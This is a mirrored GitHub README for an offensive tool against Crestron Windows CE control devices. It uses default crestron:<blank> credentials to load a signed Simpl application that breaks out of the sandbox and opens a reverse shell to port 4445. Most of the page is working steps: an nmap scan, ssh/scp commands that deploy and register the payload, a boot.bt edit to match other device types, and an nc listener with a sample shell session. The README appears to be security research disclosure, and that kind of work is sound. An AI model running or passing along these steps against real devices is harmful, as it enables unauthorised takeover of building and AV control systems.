Giter VIP home page Giter VIP logo

crestron's Introduction

crestron

Tools for taking over Crestron Windows CE devices without the need for Crestron Toolbox.

If you have authenticated access, or the default crestron:<blank> credentials are still enabled, you can use the provided Simpl application to load a malicious application that breaks out of the sandbox to connect back to you.

In a perfect world, Crestron Simpl applications run in a sandbox and are signed with a special Crestron certificate that is shipped with Crestron Toolbox or the Simpl IDE. However, the application in this repository is a signed Crestron application that breaks out of the Simpl sandbox on supported Crestron Windows CE devices. Windows .NET Compact Framework v3.5 is the expected target.

The ports available to the interface can change depending on the device type, and whether you are looking at the control side or the LAN side. If the device has only the LAN interface connected, it will listen with all ports on that interface. Otherwise, the control ports will be listening on the control interface. The key ports are 21, 22, 23, 41794, or 41795.

$ nmap 192.168.1.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:46 CDT
Nmap scan report for DMPS3-7f81812f.attlocal.net (192.168.1.174)
Host is up (0.0036s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
443/tcp  open  https
843/tcp  open  unknown
6510/tcp open  mcer-port

This assumes you are starting from a clean slate. If you would like to factory reset the device to ensure nothing weird happens, SSH into the device and run RESTORE.

mkdir tmp
cd tmp
unzip ../pro3.lpz
ssh [email protected] del \\User\\*
scp * [email protected]:\\User
ssh [email protected] copy \\User\\boot.bt \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa_archive.zip \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.bin \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.cdm \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.rte \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpCustomAttributesInterface.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpData.dat \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpHelperInterface.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusLibrary.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusManagerApp.exe \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusObjects.dll \\Simpl\\App01\\
ssh [email protected] progregister -P:all
ssh [email protected] progreset

Other Devices

If you can telnet or SSH into the device, the command prompt will contain the RackType that you can update boot.bt with.

$ telnet 192.168.1.174
Trying 192.168.1.174...
Connected to 192.168.1.174.
Escape character is '^]'.
DMPS3-4K-150-C Console
Warning: Another console session is open 

DMPS3-4K-150-C>

In boot.bt, the RackType is in the first stanza and by default is the PRO3.

[LG_BOOT_DATA]
BinFileName=fdsa.bin
SMWFileName=fdsa.smw
NumberSymbols=15
NumberSignals=33
RouteFileName=fdsa.rte
CUZ=1.007.0017
RackType=PRO3                 <---------- here
SymParamVersion=21.007.0017
NumberParameters=3
NumRealIntegralParams=0
NumRealStringParams=3
NVRAMUsed=0

[...snip...]

Replacing PRO3 with the device type will ensure the device does not reject the application.

Using the shell

The shell expects a \User\ip file with the IP address to connect back to. Port 4445 is hardcoded.

$ echo -n 192.168.1.123 > ip
$ scp ip [email protected]:/User

Once the connection is made, you can begin interacting outside of the sandbox.

$ nc -l 4445
Connected
 > ls
\Network
\Windows
\Temp
\Program Files
\My Documents
\HTML
\Sys
\Simpl
\Nvram
\FTP
\User
\ROMDISK
\Application Data
\My Recent Documents
\Recycled
\SSHBanner
 >

For instance, compared to the sandbox directory list.

$ telnet 192.168.1.174
Trying 192.168.1.174...
Connected to dmps3-7f81812f.attlocal.net.
Escape character is '^]'.
DMPS3-4K-150-C Console
Warning: Another console session is open 

DMPS3-4K-150-C>dir
Directory of \
      [DIR]  09-21-15 08:58:24 FTP
      [DIR]  09-21-15 08:58:24 HTML
      [DIR]  09-21-15 08:58:24 Nvram
      [DIR]  09-21-15 08:58:26 ROMDISK
      [DIR]  09-21-15 08:58:24 Simpl
      [DIR]  09-21-15 09:05:26 SSHBanner
      [DIR]  09-21-15 08:58:24 Sys
      [DIR]  09-21-15 08:58:26 User

DMPS3-4K-150-C>

Available commands are ls, pwd, exec, cat, cd, and base64.

On PRO3, for instance, you can run a graphics test executable for demonstration of the issue.

 > exec \Windows\cube.exe

A spinning cube will replace the Crestron menu on the display.

crestron's People

Contributors

brandonprry avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.